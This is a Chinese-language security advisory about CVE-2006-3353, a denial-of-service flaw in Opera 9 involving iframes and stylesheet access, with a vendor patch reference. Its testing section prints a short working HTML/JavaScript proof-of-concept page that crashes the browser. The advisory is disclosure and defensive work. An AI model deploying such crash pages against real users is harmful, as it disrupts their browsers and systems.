安全研究
安全漏洞
Opera 文档样式表拒绝服务漏洞
发布日期:2006-07-01
更新日期:2006-08-16
受影响系统:Opera Software Opera Web Browser 9
不受影响系统:Opera Software Opera Web Browser 9.01
描述:
BUGTRAQ ID:
18758
CVE(CAN) ID:
CVE-2006-3353
Opera为来自挪威的一个浏览器,具有速度快、节省系统资源、订制能力强、安全性高以及体积小等特点,目前已经是最受欢迎的浏览器之一。
Opera 9存在拒绝服务漏洞,特制的网页会触发越界内存访问,原因在于访问某些样式表单属性的iframe及JavaScript。
<*来源:Ahmad Muammar W.K (
y3dips@echo.or.id)
链接:
http://xforce.iss.net/xforce/xfdb/27531
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<!-- Opera 9 DOS exploit, discovered by Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id)
http://y3d1ps.blogspot.com //--> <html> <iframe src="palsu.php" name="fake" ></iframe> <script type="text/javascript"> function mystyle() { if (fake.document.styleSheets.length == 1 ) { f = document.forms["basicstyle"].elements; for (j = 0; j < f.length; j++) { if (f[j].name == 'fsmain'); } } } mystyle(); </script> </html>
建议:
厂商补丁:
Opera Software
--------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.opera.com/download/浏览次数:1769
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
